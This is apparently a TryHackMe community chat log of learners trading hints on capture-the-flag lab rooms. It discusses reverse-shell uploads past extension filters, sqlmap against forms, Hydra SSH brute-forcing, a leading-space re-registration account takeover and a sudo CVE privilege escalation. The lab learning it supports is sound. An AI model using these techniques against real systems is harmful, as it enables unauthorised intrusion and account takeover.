You're welcome
When will the crontab on the deployed instance (10.10.55.242) run?
Mind giving some info? 
That is not a number, that is a word.
That is Linux fundamentals PT 3, if I recall correctly
ah well such info should be included in a question and then you're right it's a word 😄
@rain latch You helped me yesterday on this question, lol xD
got quite some stuff on my mind i dont remember such stuff tbh ¯_(ツ)_/¯
guys, where do i get the user's account status on windows server?
Account is ___
This is a trick question
Yea my message above is the "format" you can read the account status in local users and groups for example
There check the properties of the account
^
ok
i got the right answer, but i think it is wrong (because that option is unchecked)
I was literally just doing the room and the option is checked for me
are you sure you were looking at the correct account?
Hi everyone, newbie here. i am stuck on a question. what is networking? what is the key term for devices that are connected together ?
did you read the first sentence
I have read the whole thing loads of time, second day trying to figure it out 🤦
the answer lies literally within the first sentence
Oh dear. i will look at the first sentence thank you
no worries
Room name: rootme
When I'm uploading an empty file with a .php5 or .phtml extension it's being uploaded, but when I'm uploading the actual shell ...it's not being uploaded..what might be the reason??
!docs verify
Follow this link to verify yourself and provide screenshots
Besides that, there are some directories which you can find using gobuster/dirsearch.
All the uploaded files above are normal files...but when I'm trying to upload the pentest monkey reverse shell it's showing that the "connection was reset"
Terminate the deployed machine and re-deploy it again because such thing shouldn't happen
Yaa..but still the same issue
Is the problem occurring while uploading the rev shell or is it when executing it to gain reverse connection?
when uploading the shell
Try to upload newly downloaded php-reverse-shell and see if it works
But that's strange anyways
I'm having issues with the CC: Pentesting room, task 18. Every time I run the sqlmap command I get an error back
You have to provide a parameter which might be vulnerable to sqli just like http://foobar.xyz/secret/?id= and here, if you can see, id parameter might be (might not) vulnerable to sqli
ohhh okay, so I've skipped a step haha
I still can't seem to get it to do much 😕
There is a message box on the site, but entering text into it doesn't change the url
There's a "forms" option on sqlmap in case you got a form on the website but no parameter in the url
It should even be --forms if i remember correctly
Yeah it was, thanks 😄 I got it eventually, but then got stuck with finding the flag because my database dumps were empty databases
Hey! Hope everyone is having a good week. I am working on the Bounty Hacker Room and am having a difficult time with Hydra, it says that it will take 2 hours to complete with the common_root.txt attacking ssh. Is there a way to speed this up? Hydra does allow for up to 64 tasks at a time but this gave me an error.
Thanks for getting back to me. I have not yet. Where is the announcements directory? I was able to find the user login as lin in the task.txt file.
Man, I was way over thinking owasp top 10, task 19 😮💨
Did you find the other file besides tasks.txt in ftp?
Figure out what can you do with it.
Yaa..finally it worked, uploaded a web shell to execute commands and from there spawned a shell using python...but idk why the pentestmonkey rev shell won't upload.
could anyone help me with 'network services' on exploiting smb?
Ask your question (and tell us the task number) and if someone can help, they will
Hello,
I am on "Network Services" module and I am trying to launch my machine. I clicked on "Start Machine" >> "Start Hackbox" in machine I am trying ssh tryhackme@(ip addres) and entering password (tryhackme) but its saying "permission denied"
Just looking now, which task number is it?
Complete Beginner >> Network Exploitation Basics >> Network Services
Task 3
@vital crown
Looking at that task you don't need to SSH into it. You're doing SMB enumeration which you would run from your attackbox
ohhh ok..
Good morning all. I am currently stuck on Task 4 in the Network Services Room. The question is:
"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
For the life of me I cannot find anything that indicates who the profile folder belongs to. There's an interesting .txt file but I can't seem to read its content. nano, vi, cat and more do not provide any help. 😕
Anyone familiar with this?
Found the solution:
Once Connected -
help (Get a listing of what commands are available)
ls (List share content)
get "filename" (This will save a copy of the file on your local machine that you can read later)
My get command kept failing because I was not using quotes around the file name.
Hope this helps!
Hello, @white salmon !
I'm stuck at the same question. I just wrote the SQL query, but it doesn't work.
Can you give me an idea?
hi, any hint about the Cold VVars room
am i looking at the wrong thing? if so what should i be looking for roughly
nevermind
done it
does any one here know when coldvvar was released stuck on privesc to 2nd user
im stuck too
hello,i need help, i am still sucks at this "wget" why still refused? i am trying with AttackTheBox and my machine, but not working.
Hi all - I'm on the vulnversity room and the intruder sniper payload doesn't seem to work as designed
I get 200 status for all extensions
when actually .php isn't allowed.. shouldn't it show something other than 200?
my settings match the room suggestion too..
you have a web server running from the source to respond to the wget on that port?
did you start the python3 http server on the victim box?
yeah from the source, i try it
so if you do an nmap for port 8000 on the victim box you see it open?
yes u mean python3 -m http.server? i already did it
rustscan -a 10.10.215.52
do that and check you see port 8000
looks like its not open perhaps
yes it's open
i try nmap -sV -sC
yups,tryhackme
it looks like you're running the command on the victim box rather than the tryhackme box?
thats what my cmd looks like on tryhackme box
I think your box has port 80 open.. not 8000
that also may be the issue
owh thanks i will try again later
Gave +1 Rep to @twilit kraken
The reason you are getting 200 statuses, is because the web page itself is loading up correctly. What I would suggest is try a manual upload and see what error is mentioned on the webpage when you upload an incorrect format, then in Burp use the Grep-Match option in the Intruder options to flag any response that includes that text. The rationale being if there is no error text flagged then it might be a successful upload
ahhhaaaa perfect thanks that makes sense
oddly thats not working.. I am prob being a wally still
did it flag in them in the results?
no I don't think so.. I also tried setting a location so it knows where to look but that didn't pick anything up also
the above screenie is with the grep set
just booting the room up
oh thanks Gogs really appreciate that.. while I know the answer to the next question the fact that Burp doesn't flag it means I must be doing something wrong I guess
Gave +1 Rep to @vital crown
just added in response field.. is this what i am supposed to look for?
doesn't look right still to me
based on the answer
as it should show 0 response for one of those
sorted!
needed "case sensitive match"
finickity thing lol
yup! but thanks so much I didn't know about that option
Gave +1 Rep to @vital crown
No problem. i think it gets mentioned on one of the rooms, that's the only reason I know of it
Its been annoying me for days that one tried all sorts hahaha.. didn't wanna move on till I understood why
In the Retro CTF room I've got the problem that I cannot choose a browser (or app) to open the certificate URL; anyone knows why or how to fix that?
The bit that got me on that room was I had URL encoding turned on and it kept on turning the . into %2e
Yeah I did spot that one today when i was looking through results too. And then remembered to turn that off from another room when fuzzing.
but I also didn't spot that for a week haha
soooo on same room.. I'm trying to get the file contents across
its creating the file but not transferring file content oddly and the nc session kinda just sat there waiting as though I need to do something else
actually ignore me thats odd it did it that time!

Anyone who did Cold VVar?
@shut pollen i'm doing it. i made the first enumeration for the moment. I have to go outside. i will continue later.
@twilit kraken I didn't read your entire problem, but something else to look for is the response length. There are times/rooms where the response code will still be 200, but the message that it gives back is different.
im stuck too trying to privesc to 2nd user
Well it took some braincells but I finally got root xD
any hint for the 2nd user i feel it has something to do with ||tmux||
you have any hints for getting to user 2
https://tryhackme.com/room/commonlinuxprivesc, task 4, the question with the bash script run by cron:
I used crontab -l to see if there were any cron jobs (there weren't) and I don't have permission to use -u. So how would I have found out, that ||there's a script on the desktop of user4||? I don't believe I was just supposed to go through every folder and find it that way. I found out via the hint but want to know how else to do it.
Edit: I believe I was supposed to use LinEnum and just did it all by hand, because my attention span seems to be a bit short right now... But still: How would I do it by hand?
i think i might have something but not at my computer right now
i am stuck on intro2windows, am trying to connect to the remote windows using both Remmina and xfreerdp, but i am unable to connect
sometimes it get connected, but it just hangs and disconnects
can someone suggest me something apart from remmina and xfreerdp
How did you find the answer? I'm having the same issue.
still stuck on coldvvar trying to privesc to user 2, any hints
Has anyone completed Cold VVars && willing to give me a hint on: ||PrivEscing from ArthurMorgan||?
have you tried CVE-2021-3156?
doesn't appear to be vulnerable to this CVE
forgot give rep++, my bad, thanks mate, for telling me yesterday,
now, i just learned 2 things, first check the port it's open or closed, and make sure ur port is right, i Make 800O not 8000 XD
Gave +1 Rep to @pure thistle
Need nudge
For cold war
Got login page tried SQL injection
Not successful
Any hints
Hey I'm hard stuck on that box as well but a bit further down the line. When you attempt your injection consider what you're trying to bypass. ||https://book.dragonsploit.com/web-application-testing/attacks/sqli||
Yeah, it does not seem to be vulnerable to that CVE.
||as many similarities as there are between ubuntu and debian, this is an Ubuntu 18.04 Bionic Beaver and the ubuntu package does not seem to be affected by this CVE ||
Check payloadsallthethings
The room title should be a hint
yo dawg, I heard you like hints so we put a hint in your hint
hi
If you strike a V it helps
Yeah, I consider the name could be a hint but could not think/find a connection. 😞 I wouldn’t doubt it is something simple but I have no idea what I’m overlooking.
OWASP Top 10: Task 7, [Severity 2] Broken Authentication Practical
||After typing in " darren" to the username and filling in other credentials, nothing happens besides telling me that the user already exists.||
@light tundra Did you then try to register an account with that username?
I'm pretty sure! Like going back to the "register" button and trying the same thing again? Let me boot up my VM and try it once more and I'll get back to you
@light tundra You should just be able to register that user again and because it already exists it'll just log you in and give you access to the other users stuff. (aka the flag)
yeah I figured that's what should happen...
yep I know lol
to the beginning, right?
would it matter what other credentials (email / pw) I'm entering when registering?
@light tundra You'll want the details to match the other user where possible.
@light tundra just tested, as long as the user is the same it'll work. (Just add that space)
Don't forget to actually login too.
That was the thing I was missing
I kept hitting "register" expecting to be logged in. Looks like I may have misinterpreted the course lol
thank you
Gave +1 Rep to @hearty widget
What, vars?
||JOURNAL_STREAM|| has my interest but not sure about it TBH.
Probably another silly one
||command_not_found_handle|| Is curious I feel like this is something that should've hit me in the face at this point. 
There should be a suspicious environment variable
I am solving yearofthebox. I tried listing ||smb shares|| but do not have read/write access. Found two users for ||smb||, tried bruteforcing, no success yet. Also port 80 has basic auth. Any hints would be of great help. https://tryhackme.com/room/yotf
there are a couple of suspicious env vars just banging my head on the key board trying to figure out how to abuse them
working on the room Anonymous, can anyone offer up any help?
Man you gave it all out 😂
for *OWASP Top 10:Task 15 -- XML External Entity -- XXE Payload -- Am I expected to use burpsuite / another network tool for this?
or do I simply put the payload in the...payload area...
As of now I always used burpsuite for XXE
okay I'll give it a shot
got the same results as putting it in the form, so that makes sense
thank you
Gave +1 Rep to @rain latch
Apparently not as they still can't find it
So In the next task on OWASP Top 10: Security Misconfiguration. It just tells me to "hack." I'm going to guess I could probably just spend time guessing the password combo, but...can I try other methods or look for other ways to find it, like enumeration? Are the machines designed for that, or do they usually have the one specific vulnerability? I hope that question makes sense.
I doubt you are supposed to bruteforce it
Is it this note taking webapp?
yes
Just research a bit you might find some information at GitHub 😄
reading through the suggested OWASP documentation trying to find some methods as well
well I don't wanna google the answer lol
ohh, thought it was a custom-designed thing
or do you mean like the platform it's made with? I saw something about that in A6:2017 documentation
No, I mean the webapp; this pensive or what it was called again
okay
ohhhhhhhhhhh 🙂
I think I got the one just have some IRL stuff to take care of. Thanks for help.
Gave +1 Rep to @ripe hedge
Good hunting
Thanks, got it. Had to step away for a few to think to try a different vector
Gave +1 Rep to @rain latch
Anyone has a hint on the Cold VV room? can't find anything useful where i can get a foothold
Makes me feel a little like a bone head. :p
Enumerate all the things
i thougt i had but i will give it another try 😄
hey
Hey
Well, im kind of stuck at a question or task in a room, it asks me : "What is the username used on this deployable machine you are currently signed in as"
im root ???
hi sir
Which room is it?
Linux fundamentals 1
Okay gimme a sec
sure
i tried
Using your attack machine log in via SSH on the other machine running
Yeah you might have the attack box, you need to start the machine in task three
Did you SSH into the machine?